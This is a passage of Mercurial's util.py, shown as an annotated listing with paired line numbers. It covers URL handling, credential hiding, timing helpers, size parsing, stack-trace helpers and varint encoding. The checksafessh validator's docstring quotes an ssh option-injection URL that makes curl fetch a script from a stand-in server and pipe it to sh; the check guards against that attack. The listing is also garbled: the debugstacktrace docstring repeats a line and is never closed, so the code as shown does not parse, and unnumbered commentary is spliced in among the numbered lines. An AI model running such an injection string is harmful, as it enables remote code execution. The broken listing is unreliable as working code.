3189 3190 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3190 3191 'file:///c:/tmp/foo/bar'
3191 3192 >>> print(url(br'bundle:foo\bar'))
3192 3193 bundle:foo\bar
3193 3194 >>> print(url(br'file:///D:\data\hg'))
3194 3195 file:///D:\data\hg
3195 3196 """
3196 3197 if self._localpath:
3197 3198 s = self.path
3198 3199 if self.scheme == b'bundle':
3199 3200 s = b'bundle:' + s
3200 3201 if self.fragment:
3201 3202 s += b'#' + self.fragment
3202 3203 return s
3203 3204
3204 3205 s = self.scheme + b':'
3205 3206 if self.user or self.passwd or self.host:
3206 3207 s += b'//'
3207 3208 elif self.scheme and (
3208 3209 not self.path
3209 3210 or self.path.startswith(b'/')
3210 3211 or hasdriveletter(self.path)
3211 3212 ):
3212 3213 s += b'//'
3213 3214 if hasdriveletter(self.path):
3214 3215 s += b'/'
3215 3216 if self.user:
3216 3217 s += urlreq.quote(self.user, safe=self._safechars)
3217 3218 if self.passwd:
3218 3219 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3219 3220 if self.user or self.passwd:
3220 3221 s += b'@'
3221 3222 if self.host:
3222 3223 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3223 3224 s += urlreq.quote(self.host)
3224 3225 else:
3225 3226 s += self.host
3226 3227 if self.port:
3227 3228 s += b':' + urlreq.quote(self.port)
3228 3229 if self.host:
3229 3230 s += b'/'
3230 3231 if self.path:
3231 3232 # TODO: similar to the query string, we should not unescape the
3232 3233 # path when we store it, the path might contain '%2f' = '/',
3233 3234 # which we should *not* escape.
3234 3235 s += urlreq.quote(self.path, safe=self._safepchars)
3235 3236 if self.query:
3236 3237 # we store the query in escaped form.
3237 3238 s += b'?' + self.query
3238 3239 if self.fragment is not None:
3239 3240 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3240 3241 return s
3241 3242
3242 3243 __str__ = encoding.strmethod(__bytes__)
3243 3244
3244 3245 def authinfo(self):
3245 3246 user, passwd = self.user, self.passwd
3246 3247 try:
3247 3248 self.user, self.passwd = None, None
3248 3249 s = bytes(self)
3249 3250 finally:
3250 3251 self.user, self.passwd = user, passwd
3251 3252 if not self.user:
3252 3253 return (s, None)
3253 3254 # authinfo[1] is passed to urllib2 password manager, and its
3254 3255 # URIs must not contain credentials. The host is passed in the
3255 3256 # URIs list because Python < 2.4.3 uses only that to search for
3256 3257 # a password.
3257 3258 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3258 3259
3259 3260 def isabs(self):
3260 3261 if self.scheme and self.scheme != b'file':
3261 3262 return True # remote URL
3262 3263 if hasdriveletter(self.path):
3263 3264 return True # absolute for our purposes - can't be joined()
3264 3265 if self.path.startswith(br'\\'):
3265 3266 return True # Windows UNC path
3266 3267 if self.path.startswith(b'/'):
3267 3268 return True # POSIX-style
3268 3269 return False
3269 3270
3270 3271 def localpath(self):
3271 3272 if self.scheme == b'file' or self.scheme == b'bundle':
3272 3273 path = self.path or b'/'
3273 3274 # For Windows, we need to promote hosts containing drive
3274 3275 # letters to paths with drive letters.
3275 3276 if hasdriveletter(self._hostport):
3276 3277 path = self._hostport + b'/' + self.path
3277 3278 elif (
3278 3279 self.host is not None and self.path and not hasdriveletter(path)
3279 3280 ):
3280 3281 path = b'/' + path
3281 3282 return path
3282 3283 return self._origpath
3283 3284
3284 3285 def islocal(self):
3285 3286 '''whether localpath will return something that posixfile can open'''
3286 3287 return (
3287 3288 not self.scheme
3288 3289 or self.scheme == b'file'
3289 3290 or self.scheme == b'bundle'
3290 3291 )
3291 3292
3292 3293
3293 3294 def hasscheme(path):
3294 3295 return bool(url(path).scheme)
3295 3296
3296 3297
3297 3298 def hasdriveletter(path):
3298 3299 return path and path[1:2] == b':' and path[0:1].isalpha()
3299 3300
3300 3301
3301 3302 def urllocalpath(path):
3302 3303 return url(path, parsequery=False, parsefragment=False).localpath()
3303 3304
3304 3305
3305 3306 def checksafessh(path):
3306 3307 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3307 3308
3308 3309 This is a sanity check for ssh urls. ssh will parse the first item as
3309 3310 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3310 3311 Let's prevent these potentially exploited urls entirely and warn the
3311 3312 user.
3312 3313
3313 3314 Raises an error.Abort when the url is unsafe.
3314 3315 """
3315 3316 path = urlreq.unquote(path)
3316 3317 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3317 3318 raise error.Abort(
3318 3319 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3319 3320 )
3320 3321
3321 3322
3322 3323 def hidepassword(u):
3323 3324 '''hide user credential in a url string'''
3324 3325 u = url(u)
3325 3326 if u.passwd:
3326 3327 u.passwd = b'***'
3327 3328 return bytes(u)
3328 3329
3329 3330
3330 3331 def removeauth(u):
3331 3332 '''remove all authentication information from a url string'''
3332 3333 u = url(u)
3333 3334 u.user = u.passwd = None
3334 3335 return bytes(u)
3335 3336
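# Illustrative sketch, not part of the original source: both helpers round-trip
# through the url class above, so everything except the credentials survives
# (the URL is hypothetical):
#
#     hidepassword(b'http://alice:s3cret@example.com/repo')
#     # -> b'http://alice:***@example.com/repo'
#     removeauth(b'http://alice:s3cret@example.com/repo')
#     # -> b'http://example.com/repo'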
3336 3337
3337 3338 timecount = unitcountfn(
3338 3339 (1, 1e3, _(b'%.0f s')),
3339 3340 (100, 1, _(b'%.1f s')),
3340 3341 (10, 1, _(b'%.2f s')),
3341 3342 (1, 1, _(b'%.3f s')),
3342 3343 (100, 0.001, _(b'%.1f ms')),
3343 3344 (10, 0.001, _(b'%.2f ms')),
3344 3345 (1, 0.001, _(b'%.3f ms')),
3345 3346 (100, 0.000001, _(b'%.1f us')),
3346 3347 (10, 0.000001, _(b'%.2f us')),
3347 3348 (1, 0.000001, _(b'%.3f us')),
3348 3349 (100, 0.000000001, _(b'%.1f ns')),
3349 3350 (10, 0.000000001, _(b'%.2f ns')),
3350 3351 (1, 0.000000001, _(b'%.3f ns')),
3351 3352 )
3352 3353
3353 3354
3354 3355 @attr.s
3355 3356 class timedcmstats(object):
3356 3357 """Stats information produced by the timedcm context manager on entering."""
3357 3358
3358 3359 # the starting value of the timer as a float (meaning and resolution are
3359 3360 # platform dependent, see util.timer)
3360 3361 start = attr.ib(default=attr.Factory(lambda: timer()))
3361 3362 # the number of seconds as a floating point value; starts at 0, updated when
3362 3363 # the context is exited.
3363 3364 elapsed = attr.ib(default=0)
3364 3365 # the number of nested timedcm context managers.
3365 3366 level = attr.ib(default=1)
3366 3367
3367 3368 def __bytes__(self):
3368 3369 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3369 3370
3370 3371 __str__ = encoding.strmethod(__bytes__)
3371 3372
3372 3373
3373 3374 @contextlib.contextmanager
3374 3375 def timedcm(whencefmt, *whenceargs):
3375 3376 """A context manager that produces timing information for a given context.
3376 3377
3377 3378 On entering a timedcmstats instance is produced.
3378 3379
3379 3380 This context manager is reentrant.
3380 3381
3381 3382 """
3382 3383 # track nested context managers
3383 3384 timedcm._nested += 1
3384 3385 timing_stats = timedcmstats(level=timedcm._nested)
3385 3386 try:
3386 3387 with tracing.log(whencefmt, *whenceargs):
3387 3388 yield timing_stats
3388 3389 finally:
3389 3390 timing_stats.elapsed = timer() - timing_stats.start
3390 3391 timedcm._nested -= 1
3391 3392
3392 3393
3393 3394 timedcm._nested = 0
3394 3395
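# Illustrative sketch, not part of the original source: timedcm yields a
# timedcmstats object whose ``elapsed`` field is filled in once the block
# exits, after which bytes(stats) renders it via timecount():
#
#     with timedcm(b'loading %s', b'manifest') as stats:
#         pass  # ... the timed work goes here ...
#     # stats.elapsed now holds the duration in (fractional) seconds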
3395 3396
3396 3397 def timed(func):
3397 3398 '''Report the execution time of a function call to stderr.
3398 3399
3399 3400 During development, use as a decorator when you need to measure
3400 3401 the cost of a function, e.g. as follows:
3401 3402
3402 3403 @util.timed
3403 3404 def foo(a, b, c):
3404 3405 pass
3405 3406 '''
3406 3407
3407 3408 def wrapper(*args, **kwargs):
3408 3409 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3409 3410 result = func(*args, **kwargs)
3410 3411 stderr = procutil.stderr
3411 3412 stderr.write(
3412 3413 b'%s%s: %s\n'
3413 3414 % (
3414 3415 b' ' * time_stats.level * 2,
3415 3416 pycompat.bytestr(func.__name__),
3416 3417 time_stats,
3417 3418 )
3418 3419 )
3419 3420 return result
3420 3421
3421 3422 return wrapper
3422 3423
3423 3424
3424 3425 _sizeunits = (
3425 3426 (b'm', 2 ** 20),
3426 3427 (b'k', 2 ** 10),
3427 3428 (b'g', 2 ** 30),
3428 3429 (b'kb', 2 ** 10),
3429 3430 (b'mb', 2 ** 20),
3430 3431 (b'gb', 2 ** 30),
3431 3432 (b'b', 1),
3432 3433 )
3433 3434
3434 3435
3435 3436 def sizetoint(s):
3436 3437 '''Convert a space specifier to a byte count.
3437 3438
3438 3439 >>> sizetoint(b'30')
3439 3440 30
3440 3441 >>> sizetoint(b'2.2kb')
3441 3442 2252
3442 3443 >>> sizetoint(b'6M')
3443 3444 6291456
3444 3445 '''
3445 3446 t = s.strip().lower()
3446 3447 try:
3447 3448 for k, u in _sizeunits:
3448 3449 if t.endswith(k):
3449 3450 return int(float(t[: -len(k)]) * u)
3450 3451 return int(t)
3451 3452 except ValueError:
3452 3453 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3453 3454
3454 3455
3455 3456 class hooks(object):
3456 3457 '''A collection of hook functions that can be used to extend a
3457 3458 function's behavior. Hooks are called in lexicographic order,
3458 3459 based on the names of their sources.'''
3459 3460
3460 3461 def __init__(self):
3461 3462 self._hooks = []
3462 3463
3463 3464 def add(self, source, hook):
3464 3465 self._hooks.append((source, hook))
3465 3466
3466 3467 def __call__(self, *args):
3467 3468 self._hooks.sort(key=lambda x: x[0])
3468 3469 results = []
3469 3470 for source, hook in self._hooks:
3470 3471 results.append(hook(*args))
3471 3472 return results
3472 3473
3473 3474
3474 3475 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3475 3476 '''Yields lines for a nicely formatted stacktrace.
3476 3477 Skips the 'skip' last entries, then returns the last 'depth' entries.
3477 3478 Each file+linenumber is formatted according to fileline.
3478 3479 Each line is formatted according to line.
3479 3480 If line is None, it yields:
3480 3481 length of longest filepath+line number,
3481 3482 filepath+linenumber,
3482 3483 function
3483 3484
3484 3485 Not to be used in production code, but very convenient while developing.
3485 3486 '''
3486 3487 entries = [
3487 3488 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3488 3489 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3489 3490 ][-depth:]
3490 3491 if entries:
3491 3492 fnmax = max(len(entry[0]) for entry in entries)
3492 3493 for fnln, func in entries:
3493 3494 if line is None:
3494 3495 yield (fnmax, fnln, func)
3495 3496 else:
3496 3497 yield line % (fnmax, fnln, func)
3497 3498
3498 3499
3499 3500 def debugstacktrace(
3500 3501 msg=b'stacktrace',
3501 3502 skip=0,
3502 3503 f=procutil.stderr,
3503 3504 otherf=procutil.stdout,
3504 3505 depth=0,
3505 3506 prefix=b'',
3506 3507 ):
3507 3508 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3508 3509 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3509 3510 By default it will flush stdout first.
3510 3511 It can be used everywhere and intentionally does not require an ui object.
3511 3512 It can be used everywhere and intentionally does not require a ui object.
3512 3513 Not to be used in production code, but very convenient while developing.
3513 3514 if otherf:
3514 3515 otherf.flush()
3515 3516 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3516 3517 for line in getstackframes(skip + 1, depth=depth):
3517 3518 f.write(prefix + line)
3518 3519 f.flush()
3519 3520
3520 3521
3521 3522 # convenient shortcut
3522 3523 dst = debugstacktrace
3523 3524
3524 3525
3525 3526 def safename(f, tag, ctx, others=None):
3526 3527 """
3527 3528 Generate a name that it is safe to rename f to in the given context.
3528 3529
3529 3530 f: filename to rename
3530 3531 tag: a string tag that will be included in the new name
3531 3532 ctx: a context, in which the new name must not exist
3532 3533 others: a set of other filenames that the new name must not be in
3533 3534
3534 3535 Returns a file name of the form oldname~tag[~number] which does not exist
3535 3536 in the provided context and is not in the set of other names.
3536 3537 """
3537 3538 if others is None:
3538 3539 others = set()
3539 3540
3540 3541 fn = b'%s~%s' % (f, tag)
3541 3542 if fn not in ctx and fn not in others:
3542 3543 return fn
3543 3544 for n in itertools.count(1):
3544 3545 fn = b'%s~%s~%s' % (f, tag, n)
3545 3546 if fn not in ctx and fn not in others:
3546 3547 return fn
3547 3548
3548 3549
3549 3550 def readexactly(stream, n):
3550 3551 '''read n bytes from stream.read and abort if less was available'''
3551 3552 s = stream.read(n)
3552 3553 if len(s) < n:
3553 3554 raise error.Abort(
3554 3555 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3555 3556 % (len(s), n)
3556 3557 )
3557 3558 return s
3558 3559
3559 3560
3560 3561 def uvarintencode(value):
3561 3562 """Encode an unsigned integer value to a varint.
3562 3563
3563 3564 A varint is a variable length integer of 1 or more bytes. Each byte
3564 3565 except the last has the most significant bit set. The lower 7 bits of
3565 3566 each byte store the 2's complement representation, least significant group
3566 3567 first.
3567 3568
3568 3569 >>> uvarintencode(0)
3569 3570 '\\x00'
3570 3571 >>> uvarintencode(1)
3571 3572 '\\x01'
3572 3573 >>> uvarintencode(127)
3573 3574 '\\x7f'
3574 3575 >>> uvarintencode(1337)
3575 3576 '\\xb9\\n'
3576 3577 >>> uvarintencode(65536)
3577 3578 '\\x80\\x80\\x04'
3578 3579 >>> uvarintencode(-1)
3579 3580 Traceback (most recent call last):
3580 3581 ...
3581 3582 ProgrammingError: negative value for uvarint: -1
3582 3583 """
3583 3584 if value < 0:
3584 3585 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3585 3586 bits = value & 0x7F
3586 3587 value >>= 7
3587 3588 bytes = []
3588 3589 while value:
3589 3590 bytes.append(pycompat.bytechr(0x80 | bits))
3590 3591 bits = value & 0x7F
3591 3592 value >>= 7
3592 3593 bytes.append(pycompat.bytechr(bits))
3593 3594
3594 3595 return b''.join(bytes)
3595 3596
3596 3597
3597 3598 def uvarintdecodestream(fh):
3598 3599 """Decode an unsigned variable length integer from a stream.
3599 3600
3600 3601 The passed argument is anything that has a ``.read(N)`` method.
3601 3602
3602 3603 >>> try:
3603 3604 ... from StringIO import StringIO as BytesIO
3604 3605 ... except ImportError:
3605 3606 ... from io import BytesIO
3606 3607 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3607 3608 0
3608 3609 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3609 3610 1
3610 3611 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3611 3612 127
3612 3613 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3613 3614 1337
3614 3615 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3615 3616 65536
3616 3617 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3617 3618 Traceback (most recent call last):
3618 3619 ...
3619 3620 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3620 3621 """
3621 3622 result = 0
3622 3623 shift = 0
3623 3624 while True:
3624 3625 byte = ord(readexactly(fh, 1))
3625 3626 result |= (byte & 0x7F) << shift
3626 3627 if not (byte & 0x80):
3627 3628 return result
3628 3629 shift += 7
3630
3631
3632 # Passing the '' locale means that the locale should be set according to the
3633 # user settings (environment variables).
3634 # Python sometimes avoids setting the global locale settings. When interfacing
3635 # with C code (e.g. the curses module or the Subversion bindings), the global
3636 # locale settings must be initialized correctly. Python 2 does not initialize
3637 # the global locale settings on interpreter startup. Python 3 sometimes
3638 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3639 # explicitly initialize it to get consistent behavior if it's not already
3640 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3641 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3642 # if we can remove this code.
3643 @contextlib.contextmanager
3644 def with_lc_ctype():
3645 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3646 if oldloc == 'C':
3647 try:
3648 try:
3649 locale.setlocale(locale.LC_CTYPE, '')
3650 except locale.Error:
3651 # The likely case is that the locale from the environment
3652 # variables is unknown.
3653 pass
3654 yield
3655 finally:
3656 locale.setlocale(locale.LC_CTYPE, oldloc)
3657 else:
3658 yield